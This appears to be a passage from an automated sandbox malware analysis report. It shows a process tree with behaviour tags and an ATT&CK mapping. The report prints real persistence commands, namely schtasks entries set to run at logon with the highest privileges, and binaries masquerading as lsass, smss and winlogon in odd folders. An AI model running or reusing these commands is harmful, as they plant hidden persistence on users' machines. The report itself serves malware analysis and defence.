C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"5⤵PID:4948
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"' & exit6⤵PID:7272
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"'7⤵
- Creates scheduled task(s)
PID:2940
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"6⤵PID:7312
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe3⤵PID:6708
-
C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exeC:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe4⤵
- Modifies WinLogon for persistence
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies registry class
PID:1468 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\y8X70Crg2t.bat"5⤵PID:6376
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:340
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:26⤵PID:7100
-
-
C:\Users\Default\AppData\Local\lsass.exe"C:\Users\Default\AppData\Local\lsass.exe"6⤵PID:5368
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6DF8.exe"C:\Users\Admin\AppData\Local\Temp\6DF8.exe"2⤵PID:2988
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 1852 -ip 18521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5952
-
C:\Program Files\Windows Defender\mpcmdrun.exe"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable1⤵PID:7828
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6296
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "n42jvMA2SmHdRuAJFM9TIANN" /sc ONLOGON /tr "'C:\Users\Admin\Documents\emBhBCB9JrvjwUss_kimXWYl\n42jvMA2SmHdRuAJFM9TIANN.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3140
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Documents and Settings\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5456
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "1AF1" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\tmpAB12\1AF1.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5004
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Default\AppData\Local\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5420
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\PerfLogs\msiexec.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Suspicious use of SetThreadContext
- Creates scheduled task(s)
PID:3952
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ultramediaburner" /sc ONLOGON /tr "'C:\odt\ultramediaburner.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5196
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\odt\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6504
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "timeout" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\timeout.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7360
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Windows\System32\rmclient\msiexec.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2160
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5276
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:6500
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:7052
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:1492
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Winlogon Helper DLL
1Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1